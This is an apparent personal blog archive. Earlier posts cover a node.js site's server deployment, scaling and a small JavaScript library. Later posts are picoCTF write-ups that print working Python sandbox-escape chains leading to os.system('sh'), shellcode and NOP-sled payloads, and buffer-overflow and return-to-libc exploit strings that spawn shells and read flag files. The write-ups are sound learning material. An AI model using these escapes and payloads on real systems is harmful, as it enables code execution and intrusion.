Wednesday, May 29, 2013

CharityVid - Server Configuration


In this post, I will focus on how I run and update the CharityVid.org servers, using the following tools:
Lets start with Up. Up allows us to do live reloads of the site, while simultaneously load balancing across many processes. This makes it quite robust and keeps the server from going down. If one thread fails, another will just take over, no problem. Here is how I launch it:
 up -w app.js -p 3100 -n 2 -k -T charityvid  

CharityVid runs on express.js, however unlike a normal express application we do not start the server ourselves. Instead we let Up handle it:
 var app = express()  
 ...  
 app.configure('production', function() {  
   module.exports = http.Server(app)  
 })  

Now after launching, Up will watch (-w) app.js for changes, listen on port (-p) 3100, with 2 (-n) threads,  spawn new workers on death (-k), and have a title (-T) of charityvid for the process view. If we want to issue the reload command, then we call:
 kill -s SIGUSR2 $(cat /var/run/charityvid.pid)  

At this point, we have our server running on port 3100, now we need to expose it to the outside world on port 80. To do this, we will use nginx, which will also provide caching support by sitting between our express server and the internet. Here is what a basic nginx config file looks like:
 worker_processes 1;  
 error_log logs/error.log;  
 pid    logs/nginx.pid;  
 events {  
   worker_connections 1024;  
 }  
 http {  
   include    mime.types;  
   default_type application/octet-stream;  
   sendfile    on;  
   keepalive_timeout 65;  
   gzip on;  
 #charityvid.org  
   server {  
     listen    80;  
     server_name charityvid.org www.charityvid.org;  
     location / {  
       proxy_set_header Host $http_host;  
       proxy_http_version 1.1;  
       proxy_set_header Upgrade $http_upgrade;  
       proxy_set_header Connection "upgrade";  
       proxy_pass  http://127.0.0.1:3100;  
     }  
   }  
 }  

If you installed from source, start nginx by calling:
 /usr/local/nginx/sbin/./nginx  

Now we have our nginx acting as a proxy between port 3100 and port 80, for the charityvid hostnames. This is also useful because if we wanted to run multiple apps on one IP (which I do), you can have them all on port 80 but listening for different hostnames (effectively URLs).

Finally, we want to automate the deployment process. This is what fabric is for. With fabric we can issue commands to our remote server using python. A basic config looks like this:
 from __future__ import with_statement  
 from fabric.api import *  
 def ec2():  
   env.user='ubuntu'  
   env.hosts=['ubuntu@123.123.123.123']  
 def update(app):  
   with cd('/home/'+env.user+'/websites'):  
     if app=="charityvid":  
       run('cd charityvid && git pull')  
       sudo('kill -s SIGUSR2 $(cat /var/run/charityvid.pid)')  
 def nginx():  
   sudo('/usr/local/nginx/sbin/./nginx')  
 def init():  
   start('charityvid')  

We can then issue the update command like so:
 fab ec2 update:charityvid  

This will pull from the git repo (prod branch), and then send the command to Up to update. For more information on the automation used here, reference my blog post on Upstart, which outlines how we can use upstart to daemonize our server process without using screen (or byobu).

Tuesday, May 21, 2013

CharityVid - Prepping for scale


In this post, I will outline how I setup horizontal scaling on AWS EC2 , and also how I added server monitoring tools to watch my servers. I will go over:
The AWS Load balancer allow you to distribute load coming to a url to different servers. It does this by creating a dynamic DNS entry, which resolves to the server IP which has the least load and thus is best suited to handle traffic. To setup the AWS load balancer is quite simple, and it even removes the need to host your SSL certificate on the webservers themselves. Instead you can have the balancer server the SSL certificate, and then forward the SSL traffic over to port 80 on your servers. This is secure because we assume an uncompromised local network (and indeed Amazon's internal AWS network isolates instances networks properly).

The first step to load balancing is to create an AMI (hard disk clone) of your main server. From there, you can spin up multiple cloned instances based on that AMI. These clones can then be brought online, and then added to the load balancer.

Next, is the creation of the load balancer. It's quite a simple setup, the key being that you DNS is setup properly. For me, I found it easiest to move my DNS to cloudflare (which has given me other security benefits as well), and then all you do is create a CNAME record for your domain which points to the dynamic DNS of the load balancer.

Now, if a server goes down for some reason, the load balancer will automatically stop sending it traffic. It also distributes the load so that you can handle a lot more traffic.

There is a problem however, because our MongoDB instance which has all of our users is on each server independently, but we want all the servers to read from the same database. Normally, a master database server would be used, but I found it quicker and easier to use the hosted service Mongolab. With mongolab, we create a database with their interface, and then upload our existing database to the server.
 mongodump --dbpath /data/db/ --out dump  
 mongorestore -h xxx.mongolab.com:xxxx -d charityvid-database -d -u <user> -p <password> dump  

In addition to creating a production shared mongodb instance, I also created a dev clone of the database for testing purposes.

The next step is to set up services which will alert us when the service goes down, and will log error events so that we can debug issues later. For basic uptime monitoring we use Pingdom, which just pings the site every once in a while and will email us (or alert us through their android app) that the site has gone offline.

Next we setup New Relic to monitor the whole server. New Relic sets up a daemon which reports things like CPU and RAM usage, as well as network usage so that you can make sure that the server is running smoothly (and also you get a free t-shirt).

In addition to full server monitoring, I also use nodefly to monitor the main node.js server process which tracks response time, the event loop, and heap size. This is useful is we ever encounter any response time issues, or any other node.js specific issue which is not readily visible through New Relic. That being said, because I run more that one service on my server I mostly pay attention to New Relic, and only occasionally look at nodefly to make sure response times are low.

Finally, and most importantly, we need to log error events. For this we will use the Loggly service, and the nodejs winston library. For logging, I set up my own log.js file which manages the winston setup and the configuration settings with the winston-loggly plugin. It then exports the winston object so that I can import it in other modules for when I want to log things. My log.js config looks like this:
 var winston = require('winston'),  
   Loggly = require('winston-loggly').Loggly,  
   settings = require('./settings')  
 winston.add(winston.transports.File, { filename: 'charityvid.log' });  
 if(!settings.DEBUG){  
   winston.add(Loggly, {  
     subdomain: 'charityvid',  
     inputToken: settings.LOGGLY_KEY  
   })  
 }  
 //winston.remove(winston.transports.Console);  
 module.exports = winston  

In order to determine what level to log things at, I generally follow this comments suggestions: http://stackoverflow.com/a/186844

And that's it. Just make sure you log everything, so that when something bad happens (and something bad always happens), you can resolve the issue as quickly as possible.

Tuesday, May 14, 2013

Polish.js - Making JavaScript Better

Polish.js
Polish.js

JavaScript is pretty great, but it's not perfect. So I made it better by adding some extra functionality.
(note. I add 2 global functions, range and zip because they are amazing, but the rest is either scoped under the Polish namespace, or added onto the default object properties.)

Before:
 > Math.min([1,2,3])  
 NaN  
 > Math.randInt(2,10)  
 TypeError: Object #<Object> has no method 'randInt'  
 > range(1,5)  
 ReferenceError: range is not defined  
 > Math.sum([1,2,3])  
 TypeError: Object #<Object> has no method 'sum'
 > [1,2,3][-1]  
 undefined  

After:
  > Math.min([1,2,3])    
  1   
  > Math.randInt(2,10)   
  6   
  > range(1,5)   
  [1, 2, 3, 4]   
  > Math.sum([1,2,3])   
  6   
  > [1,2,3][-1]   
  3   
 > list = [1,2,3,4,5]  
 > list.pop(1) // pops index  
 2  
 > list.remove(2) // removes element  
  [1,3,4,5]  
 > list.insert(2,5)  
 [1,2,5,3,4,5]  

Now, those are just the basics. What would be really great is if we could utilize python selectors:
 > "abcdef".g('-3:-1')  
 'de'  

And wouldn't it also be great if we had access to some of the python itertools methods?
 Polish.combinations([1,2,3],2)  
 Polish.combinationsReplace("abc",2)  
 Polish.permutations([1,2])  

There are a few more goodies in there too, check out library on GitHub.

Monday, May 6, 2013

Escaping the Python Sandbox

(ROP, Overflow, format 2, mildly evil, more evilbroken cbcevergreen (2), black hole, broken rsa(2), chromatophoria(2)(3), harder serialrobomunication)
tl;dr
 eval(compile('print key', '<stdin>', 'exec'))
 GET /index.html?a="}+eval("__import__('os').system('/bin/sh')")+{"  
 __builtins__['ww']=().__class__.__base__  
 __builtins__['w']=ww.__subclasses__()  
 __builtins__['y']=w[53].__enter__.__func__  
 __builtins__['a']=y.__globals__['linecache']  
 __builtins__['os']=a.checkcache.__globals__['os']  
 os.system('cat *')
().__class__.__base__.__subclasses__()[53].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('sh')

This post is a write up of how I solved the python problems from picoCTF. Basically the problems consist of a piece of python code, which takes user input, and then eval's it. Eval then allows us to get a shell. Lets explore.

 # example1.py  
 x = input("enter something to eval:\n")  
 print "x:",x  

This is python2.7, which means that the proper way to get input is with "raw_input". The issue with "input" is that it eval's the string. That means we can do things like this:
 enter something to eval:  
 2*100  
 x: 200  

But if we try to do something like this:
 enter something to eval:  
 print "hello world"  
 Traceback (most recent call last):  
  File "pytest.py", line 2, in <module>  
   x = input("enter something to eval:\n")  
  File "<string>", line 1  
   print "hello world"  
     ^  
 SyntaxError: invalid syntax  

We get an error. This is because eval evaluates an expression. However we can get around this limitation by running some special code:
 eval(compile('print "hello world"', '<stdin>', 'exec'))  

Which looks like this:
 def listFiles(a, dir, files):  
   print files  
 path.walk(".", listFiles, None)

And then we put it in our special method:
 eval(compile('def listFiles(a, dir, files):\n\tprint files\npath.walk(".",listFiles,None)', '<stdin>', 'exec'))  

And look! (we get an error) but it lists all of the files in the directory (specifically 'your_flag_here'). Lets read that file.
 eval(compile('print open("your_flag_here").read()', '<stdin>', 'exec'))  

Ok, that solves python 3. Python 4 is a fair bit easier. Since we get the 'import' function, all we need is to get an eval on "__import__('os').system('/bin/sh')" and we're good to go. After a bit of research on Query Strings, we get this:
 GET /index.html?a="}+eval("__import__('os').system('/bin/sh')")+{"  

Cool, now onto the harder python 5 (this one was by far the most fun). Here is the source:
 #!/usr/bin/python -u
 # task5.py
 from sys import modules
 modules.clear()
 del modules
 _raw_input = raw_input
 _BaseException = BaseException
 _EOFError = EOFError
 __builtins__.__dict__.clear()
 __builtins__ = None
 print 'Get a shell, if you can...'
 while 1:
  try:
   d = {'x':None}
   exec 'x='+_raw_input()[:50] in d
   print 'Return Value:', d['x']
  except _EOFError, e:
   raise e
  except _BaseException, e:
   print 'Exception:', e

The answer to this is the second chunk of code in the tl;dr at the top, but I'm going to explain how I got there. The first thing I did was look up to documentation for exec. Then I went to see what kinds of things I had access to.
 Get a shell, if you can...  
 print "a"  
 Exception: invalid syntax (<string>, line 1)  
 eval("2+2")  
 Exception: name 'eval' is not defined  
 x   
 Return Value: None  
 x.__class__  
 Return Value: <type 'NoneType'>   
 __builtins__  
 Return Value: {}  
 y    
 Exception: name 'y' is not defined  
 __builtins__['y']=1337  
 Return Value: 1337  
 y  
 Return Value: 1337  

Cool, I can get around the 50 character limit by setting values to __builtins__. Lets dig deeper into that x.__class__ (I didn't get there as quickly as below, but you get the idea. Just use __base__, __bases__, __class__, __mro__, __subclasses__ etc - read this):
 x.__class__  
 Return Value: <type 'NoneType'>  
 x.__class__.__base__  
 Return Value: <type 'object'>  
 x.__class__.__base__.__subclasses__  
 Return Value: <built-in method __subclasses__ of type object at 0x88cd40>  
 x.__class__.__base__.__subclasses__()  
 Return Value: [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>,...  

Ok, I have a long list of values there, but now I have to find out if I can use them to get a shell. Some special values I noticed were: <type 'file'>, <type 'module'>, <type 'zipimport.zipimporter'>. Lets look at file first:
 #setup variable 'w' to access the values  
 __builtins__['ww']=().__class__.__base__  
 __builtins__['w']=ww.__subclasses__()  
 # file  
 w[40]  
 # open a file  
 w[40]('/etc/hosts').read()  
 # write to a file  
 w[40]('test','w').write('test string')  
 Exception: [Errno 13] Permission denied: 'test'  
 # lets try somewhere else  
 w[40]('/tmp/test','w').write('test string')  
 # read it back  
 w[40]('/tmp/test').read()  

Cool. Too bad we don't know the name of the key file (otherwise we could just read it in). Lets look at <module> next:
 w[47]  
 Return Value: <type 'module'>  
 w[47]('os')  
 Return Value: <module 'os' (built-in)>  
 w[47]('os').system  
 Exception: 'module' object has no attribute 'system'  

Yeah, I tried for a long time, but couldn't get it to create a useful object. Lets move on to zipimporter. It looks like we should be able to read in a zip file containing a python module. The next step is figuring out how to get a zip onto the server. Remember that we can write arbitrary files to /tmp, and that python can write arbitrary bytes in strings with its escape sequence. This means we can do this:
 #the zip file in hex  
 50 4b 03 04 14 03 00 00 08 00 ce ad a4 42 5e 13 60 d0 22 00 00 00 23 00 00 00 04 00 00 00 7a 2e 70 79 cb cc 2d c8 2f 2a 51 c8 2f e6 2a 28 ca cc 03 31 f4 8a 2b 8b 4b 52 73 35 d4 93 13 4b 14 b4 d4 35 b9 00 50 4b 01 02 3f 03 14 03 00 00 08 00 ce ad a4 42 5e 13 60 d0 22 00 00 00 23 00 00 00 04 00 00 00 00 00 00 00 00 00 20 80 a4 81 00 00 00 00 7a 2e 70 79 50 4b 05 06 00 00 00 00 01 00 01 00 32 00 00 00 44 00 00 00 00 00  
 #save it to strings in 7 byte chuks  
 __builtins__['a']='\x50\x4b\x03\x04\x14\x03\x00'  
 __builtins__['b']='\x00\x08\x00\xce\xad\xa4\x42'  
 ...  
 __builtins__['t']='\x00\x44\x00\x00\x00\x00\x00'  
 __builtins__['u']=a+b+c+d+e+f+g+h+i+j+k+l+m+n+o  
 __builtins__['v']=u+p+q+r+s+t  
 #write it to a file  
 w[40]('/tmp/z','wb').write(v)  
 #now lets load it in  
 w[49]  
 Return Value: <type 'zipimport.zipimporter'>  
 #and....  
 w[49]('/tmp/z').load_module('z')  
 Exception: can't decompress data; zlib not available  

That last part... after all that work... made me... sad. Very sad.
But I had to move on, and get past the fact that they COMPILED PYTHON WITHOUT ZLIB. Next, I tried to just overwrite their file with my own:
 w[40]('task5.py','w').write('z')  
 Exception: [Errno 13] Permission denied: 'task5.py'  

No luck. I then googled around and found this page. The main post seemed like it could work, but was too complicated for me to fully grasp (and also there's a 50 character limit per entry, so it would take forever to input it). What interested me more was the comment:
 TL;DR  
 __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__)  
 import sys; print open(sys.argv[0]).read()  

Hey, I can do that!
 # the class  
 w[53]  
 Return Value: <class 'warnings.catch_warnings'>  
 #and.....  
 w[53]()._module.__builtins__  
 Exception: 'warnings'  

Nope. Not today.
So I kept looking (I was going though the modules by hand for a while, but no luck)
Then I found this script. Huh, that looks interesting. Lets run it on my machine (after reading the source).
...
Examining codecs.IncrementalEncoder  
 Looks like codecs.IncrementalEncoder.__init__.__func__.__globals__['__builtins__'] might be builtins  
 Examining codecs.IncrementalEncoder()  
...

Well, as it turns out, those are false positives (they return the local broken __builtins__). I added this to the searching script to have it find less false positives:
 from sys import modules  
 modules.clear()  
 del modules  

Now the results are less, but still quite numerous. Based on the information previously learned from this guy, I realized that the key was to get into an objects '__enter__'. Scrolling though the indices  we see that warnings.catch_warnings (previously caused an exception) can be accessed through its __enter__ param (without invoking it). This looks quite promising, and using one of the strings from the search, we get this:
 # target, with 50 character max per line  
 # warnings.catch_warnings.__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os']  
 w[53]  
 Return Value: <class 'warnings.catch_warnings'>  
 __builtins__['y']=w[53].__enter__.__func__  
 Return Value: <function __enter__ at 0x7fdf74cfe1b8>  
 y  
 Return Value: <function __enter__ at 0x7fdf74cfe1b8>  
 __builtins__['a']=y.__globals__['linecache']  
 Return Value: <module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>  
 __builtins__['os']=a.checkcache.__globals__['os']  
 Return Value: <module 'os' from '/usr/lib/python2.7/os.pyc'>  
 os.system('sh')  

Thank you sir, may I have another?

Buffer Overflows - The Basics

Recently I competed in picoCTF, a hacker CTF game, and thought I would share some of my solutions. The first of which, is how I did the buffer overflow(s). (for those that don't know, CTF consists of 'flags' which are special strings that you get by exploiting vulnerabilities in programs).

Lets start with what a basic vulnerable application would look like.
 void function(char *str) {  
   char buffer[16];  
   strcpy(buffer,str);  
 }  
Now lets say we give that function a string which is longer than 16 characters. Instead of throwing an exception, it will happily write those bytes to the stack.

The Stack:
The stack is basically the program in memory (a continuous chunk). Here's how it looks (remember stacks are last in first out).
[      return address         ] <-- this is the address of the next funciton to call, we want to overwrite this
[         eip (address)        ] <-- this takes up memory we want to overwrite this
[       stack variable         ] <-- this takes up memory
[          buffer[15]           ] <-- this is the 16th character of our input string
[                 ...                 ]
[          buffer[0]             ] <-- our input starts here


So the idea behind a buffer overflow, is to overflow the buffer:
(input: 'AAAA...AAAAEXECUTESHELLCODE')


[           get shell              ] <-- this is the secret sauce
[        0x41414141          ] <-- overwrite garbage
[       0x41414141           ] <-- overwrite garbage
[          0x41414141        ] <-- 4 letter 'A's
[                 ...                  ]
[          0x41414141        ] <-- buffer starts here

Now, before we get to the secret sauce, lets first understand how were gonna write those 'A' to the buffer.
 ./buffer_overflow $(python -c 'print "A"*28')  
I use python, but you can use other languages too.

Ok, so now we have a bunch of A's on the stack. But how do we know how many we need?
To be honest, I'm not super sure. I know that its a multiple of 4 plus the buffer size (in this case 16). You can guess and check, but for me its usually buffer size + 12 bytes (12 A's). Sometimes you don't know how large the buffer is (eg. no source code). In this case, just put in a lot of A's until your at the sweet spot between Segmentation Fault, and proper execution. (ps, this could be over 1000 so guess wisely).

Alright, now we have overflowed the buffer with A's , lets look at the secret sauce.
shellcode (examples). For picoCTF, we were given shellcode, but that's not always the case.
Here is the shellcode given to us (in hex):
 00000000 31 c0 f7 e9 50 68 2f 2f 73 68 68 2f 62 69 6e 89 |1...Ph//shh/bin.|  
 00000010 e3 50 68 2d 70 69 69 89 e6 50 56 53 89 e1 b0 0b |.Ph-pii..PVS....|  
 00000020 cd 80                       |..|  

When this piece of code gets executed, we get a shell. We want a shell to spawn because usually the SUID of the binary is set to a privileged user, which allows use to read flags from the disk.
The way you add this shellcode (below is a different shellcode) to your buffer overflow, is to add it to an environment variable:
 export EXPLOIT=$(python -c 'print "\x90"*1000+"\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"')  

Notice the "\x90". This is a NOP (no operation) sled, which basically means that it gets skipped over as meaningless code (From what I understand, the NOP allows the memory address to be off by a bit and it will still work).

Then to find its memory address we have a small C program:
 #include <stdio.h>  
 #include <stdlib.h>  
 int main(int argc, char **argv) {  
 printf("\n%p\n\n", getenv("EXPLOIT"));  
 return(0);  
 }  

If you're on a 64 bit machine it may come out as more than 4 bytes. This means you need to re-compile the C program with the '-m32' flag (makes it 32 bit). (gcc -m32 -o tester tester.c)

You should now have an address like this: 0xbffff688

So now, instead of giving it shellcode directly, we can give the program the address of it in memory.
Addresses are represented in little endian so we write them backwards. The code looks like this:
 ./buffer_overflow $(python -c 'print "A"*28+"\x88\xf6\xff\xbf")  
Notice how it was reversed, in 1 byte chunks (2 digits). Also notice how python lets us write the arbitrary hex values using the escape sequence "\x00". (you can usually also just write the address a ton of times, eg: "\x88\xf6\xff\xbf"*200)

That pretty much covers the basics of buffer overflows, stay tuned for a ROP tutorial (Return Oriented Programming) which can also be used to solve buffer overflow problems.

SPOILER ALERT:
The solution to picoCTF overflow 3 (has elements of ROP):
                                     (overflow) (address of 'shell' function-found with gdb) 
 ./buffer_overflow $(python -c 'print "A"*76   +  "\xf8\x85\x04\x08"')  

and overflow 4:
                         (put shellcode on stack)               (filler)  (the pointer to shellcode - shown in stack trace)  
 ./buffer_overflow_shellcode $(cat shellcode)$(python -c'print "BB"+"A"*40+"\x40\xd5\xff\xff"')  

(alternate solution if not given stack trace):
 export EXPLOIT=$(python -c "print '\x90'*1000")$(cat shellcode)  
 (run environment program above to get its address: 0xffffd433 - Assumes no ASLR)  
 ./buffer_overflow_shellcode $(python -c "print '\x33\xd4\xff\xff'*200")  

and overflow 5 (non-executable memory):
                                                      (overflow) (<system>)     (called) ('/bin/sh' from environment)  
 ./buffer_overflow_shellcode_hard $(python -c 'print "A"*1036+"\x50\x82\xe6\xf7"+"sh;#" +  "\x11\xd8\xff\xff"')  
(Note, the address for '/bin/sh' from gdb was 0xffffd80f and wasn't working, so I just played with the address (increased by 1, then 1 more) until it worked - note also that I used gdb instead of the normal dump program above, as the address was different. This is because the stack got modified slightly during execution (out of our control). The <system> comes from ROP (found with gdb), so stay tuned for more info on that).
gdb looked like this:
 (gdb) break main  
 (gdb) run  
 (gdb) x/s *((char **)environ)  
 0xffffd805:      "EXPLOIT=/bin/sh"  
 (gdb) x/s 0xffffd80d  
 0xffffd80d:      "/bin/sh"  

Update:
Getting environment variables does not always work (ie. overflow 5) so I came up with an alternate solution, using PATH and a string from the binary. Here is what the process looks like:
 mkdir cmd  
 cd cmd  
 echo "cat /problems/stack_overflow_5_0353c1a83cb2fa0d/key" > a  
 chmod +x a  
 export PATH=/home2/user1792/cmd:$PATH  
 cd /problems/stack_overflow_5_0353c1a83cb2fa0d  
 gdb buffer_overflow_shellcode_hard  
 (gdb) break main  
 (gdb) run  
 (gdb) find &system,+999999,"a"  
 >> 0xf7e9e6ab #this is the address we will use  
 >> 0xf7f0fb8e <setpriority+14>  
 >> (cont.)  
                                                     (fill)    (system)          (junk)    ("a" address)
 ./buffer_overflow_shellcode_hard $(python -c 'print "A"*1036+"\x50\x82\xe6\xf7"+"AAAA" +"\xab\xe6\xe9\xf7"')  



Here are some good sources for more information on buffer overflows:
http://insecure.org0xffffd7f0/stf/smashstack.html
http://security.stackexchange.com/questions/13194/finding-environment-variables-with-gdb-to-exploit-a-buffer-overflow
http://www.lopisec.com/2011/12/smashthestack-io-level-5-writing-my.html
http://raidersec.blogspot.com/2012/10/smash-stack-io-level-3-writeup.html
http://key-basher.blogspot.com/2013/04/smash-stack-level-5.html

ROP (Return Oriented Programming) - The Basics

If you haven't read my blog post on buffer overflows, I recommend you read it to better understand this post. This is based on the CTF competition picoCTF, but should apply to most (basic) ROP problems.

What return oriented programming is all about:
ROP is related to buffer overflows, in that it requires a buffer to overflow. The difference is that ROP is used to bypass certain protection measures that prevent normal buffer overflows. It turns out that a lot of the time, memory in programs is marked as non-executable. This means that we can't just put shellcode on the stack and have it execute, this is where ROP comes in.
Recall the stack:

[      return address         ] <-- this is the address of the next function to call, we want to overwrite this
[         eip (address)        ] <-- this takes up memory
[       stack variable         ] <-- this also takes up memory
[          buffer[15]           ] <-- this is the 16th character of our input string
[                 ...                 ]
[          buffer[0]             ] <-- our input starts here

Now, our goal (as in buffer overflows) is to take control of the stack. At this point, go watch this video: http://codearcana.com/posts/2013/04/28/picoctf-videos.html. It will explain the concept behind how we will need to modify the stack in order to get what we want, and I will show you the code.

Lets walk through ROP 3:
 #undef _FORTIFY_SOURCE  
 #include <stdio.h>  
 #include <stdlib.h>  
 #include <unistd.h>  
 void vulnerable_function() {  
      char buf[128];  
      read(STDIN_FILENO, buf,256);  
 }  
 int main(int argc, char** argv) {
      vulnerable_function();  
      write(STDOUT_FILENO, "Hello, World\n", 13);  
 }  

Ok, so we have a 128 byte buffer. Remember that there is extra stuff above it in the stack, so we need to add some extra bytes to our overflow (12). Our exploit string looks like this:
 cat <(python -c 'print "A"*140') - | ./rop3  

Now lets add a return address. Specifically, lets add the address that points to the <system> call.
This is what we need to accomplish in C which will give us a shell.:
 system("/bin/sh");  

So we open up the program in gdb, and print out the adresss of system:
 gdb rop3  
 (gdb) break main  
 (gdb) run  
 (gdb) print system  
 $1 = {<text variable, no debug info>} 0xf7e68250 <system>  

Alright, system is at 0xf7e68250, which in escaped little endian looks like: \x50\x82\xe6\xf7.
Now our exploit string looks like this:
 cat <(python -c 'print "\x00"*140+"\x50\x82\xe6\xf7") - | ./rop3  

We need 2 more things, a fake return address and an argument to pass to system ("/bin/sh").
The fake return address can be anything, so I chose "\x00"*4 (remember an address is 4 bytes).
To get the "/bin/sh" string to pass in, were going to have find it inside of libc (unlike ROP 2, where it was given to you). This is done using gdb find, like so:

 (gdb) break main  
 (gdb) run  
 (gdb) print &system  
 $1 = (<text variable, no debug info> *) 0xf7e68250 <system>  
 (gdb) find &system,+9999999,"/bin/sh"  
 0xf7f86c4c  
 warning: Unable to access target memory at 0xf7fd0fd4, halting search.  
 1 pattern found.  

Now we have the string "/bin/sh" at 0xf7f86c4c. Lets finish constructing our exploit string:
                         (overflow)  (<system>)      (fake return address) ("/bin/sh" from libc)  
 cat <(python -c 'print "\x00"*140+"\x50\x82\xe6\xf7"+    "\x00"*4        +"\x4c\x6c\xf8\xf7"') - | ./rop3  

Done!
 id  
 uid=1796(user1792) gid=3009(rop3) groups=1797(user1792),1002(webshell)  

Now for ROP 4 (by writing this, I was able to then go back and solve it).
Here is my solution:
                        (overflow) (<execlp>)     (fake return) ("/bin/sh")(twice) ($EXPLOIT env variable)    (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+   "A"*4  +"\x4f\xbf\x0c\x08"*2+"\x50\xd8\xff\xff"+"\xa1\x97\x0c\x08"') - | ./rop4  

And the problem source:
 #include <stdio.h>  
 #include <unistd.h>  
 #include <string.h>  
 char exec_string[20];  
 void exec_the_string() {  
      execlp(exec_string, exec_string, NULL);  
 }  
 void call_me_with_cafebabe(int cafebabe) {  
      if (cafebabe == 0xcafebabe) {  
           strcpy(exec_string, "/sh");  
      }  
 }  
 void call_me_with_two_args(int deadbeef, int cafebabe) {  
      if (cafebabe == 0xcafebabe && deadbeef == 0xdeadbeef) {  
           strcpy(exec_string, "/bin");  
      }  
 }  
 void vulnerable_function() {  
      char buf[128];  
      read(STDIN_FILENO, buf, 512);  
 }  
 int main(int argc, char** argv) {  
      exec_string[0] = '\0';  
 
      vulnerable_function();  
 }  


So, probably not how you were suppose to solve it (based on the source code), but it works. With ROP4, were not given <system>, but we are given <execlp>. execlp takes 3 parameters:
char *file, char *arg, NULL
Our goal then is to run this (not really though, as you will learn later):
 execlp("/bin/sh","/bin/sh",NULL);  

Lets get the addresses of <exclp>, "/bin/sh", "sh", and NULL using gdb:
 (gdb) break main  
 (gdb) run  
 (gdb) print execlp  
 $1 = {<text variable, no debug info>} 0x8053ab0 <execlp>  
 (gdb) find &execlp,+999999999,"/bin/sh"  
 0x80cbf4f  
 (gdb) print &null  
 $3 = (<data variable, no debug info> *) 0x80c97a1  
 (gdb) x/s 0x80c97a1  
 0x80c97a1 <null>:      "(null)"  

Alright, lets try it:
                      (overflow)    (execlp)     (fake return) ("/bin/sh")(three times)    (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+   "A"*4+   "\x4f\xbf\x0c\x08"*3+   "\xa1\x97\x0c\x08"') - | ./rop4  
*note, I don't know why I needed /bin/sh 3 times, but it works so just roll with it.

However, when we do that, we get:
 /bin/sh: /bin/sh: cannot execute binary file  

Now, here is where I will admit that I don't actually know C (ie. how your suppose to call execlp). What I do know is that it's calling sh, with the parameter sh, which you can't do (sh sh: error). So instead of trying to fix that, I decided to change the argument passed to sh to be my own program (in my home directory). It looks like this:
 # rop4s.sh  
 cat /problems/ROP_4_887f7f28b1f64d7e/key  

Now, we need to be able to pass in the location of that file ("/home2/user1792/rop4s.sh") to our execlp function. Here is where we need to use an environment variable. Lets assign our string to EXPLOIT and then use our program from buffer overflows to find its address (compile with '-m32' to get a shoter memory address - gcc -m32 -o printer printer.c):
 export EXPLOIT="/home2/user1792/rop4s.sh" 
 /* printer.c */  
 #include <stdio.h>   
 #include <stdlib.h>   
 int main(int argc, char **argv) {   
  printf("\n%p\n\n", getenv("EXPLOIT"));   
  return(0);   
 }   

Running that we get: 0xffffd830 as our address. Alright, lets use that instead of our 3rd "/bin/sh":
                       (overflow)    (execlp)      (fake return) ("/bin/sh")(two times) (EXPLOIT address)     (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+    "A"*4+   "\x4f\xbf\x0c\x08"*2+  "\x30\xd8\xff\xff"+"\xa1\x97\x0c\x08"') - | ./rop4  
 /bin/sh: �z X�K ����i686: No such file or directory  

Well that didn't work. Lets increase the address of our environment variable by an arbitrary 32 (0x20).
                        (overflow) (<execlp>)     (fake return) ("/bin/sh")(twice) ($EXPLOIT env variable)    (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+   "A"*4  +"\x4f\xbf\x0c\x08"*2+"\x50\xd8\xff\xff"+"\xa1\x97\x0c\x08"') - | ./rop4  

Success! Wait... what just happened. Yeah, I have no idea. Good luck!
(I got the 0x20 increase by just increasing the value arbitrarily to something like 0x18, and found my environment variable stuck in there. Just increased the address until it cut off the "EXPLOIT=" bit before the path).

Normally ASLR is turned on, which randomizes addresses (like our environment variable) so that they're impossible hard to find. In this case ASLR was not turned on, but the stack got modified slightly anyways. Basically something caused the stack to change and move stuff around (ie. the real address to our environment variable), which we cannot always predict. That being said, we can still guess (as long as ASLR is off) and it turns out that we weren't that far off (0x20). Bypassing ASLR is outside the scope of this post (and my knowledge) but its nice to clear up that bit.

Update:
Finding the environment variable with a mangled stack can be tough, so I figured out a more robust solution. Instead of using an environment variable, lets just make a new command and use strings from libc to call it. This is what I mean:

1. remember rop4s.sh?, make a copy of it and name it "ch"
2. now edit your PATH and add the directory of your "ch" shell script file
3. now you can call "ch" from the command line, and it should run your script

Now lets see how the code looks:
 # first we need a string from libc that isn't already a command (I chose "ch")  
 gdb rop4  
 (gdb) break main  
 (gdb) run  
 (gdb) print execlp  
 >> $1 = {<text variable, no debug info>} 0x8053ab0 <execlp>  
 (gdb) find &execlp,+9999999,"ch"  
 >> 0x80ccf48 <__PRETTY_FUNCTION__.8742+9>  
 >> 0x80dafa1 #well, use this address  
 # now we isolate rop4s.sh and rename it to "ch"  
 mkdir cmd  
 cp rop4s.sh cmd/ch  
 # and then add it to our path  
 export PATH=/home2/user1792/cmd:$PATH  
 # and our new exploit becomes:  
                         (fill)  (execlp)          (retn) ("/bin/sh")(twice)      ("ch")              (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+"A"*4+"\x4f\xbf\x0c\x08"*2+ "\xa1\xaf\x0d\x08"+"\xa1\x97\x0c\x08"') - | ./rop4  


For more info on ROP's (and bypassing ASLR) check out these sources:
https://isisblogs.poly.edu/2011/10/21/geras-insecure-programming-warming-up-stack-1-rop-nxaslr-bypass/
http://blog.the-playground.dk/2012/08/lesson-learned-from-my-first-rop-exploit.html
http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx
http://security.dico.unimi.it/~gianz/pubs/acsac09.pdf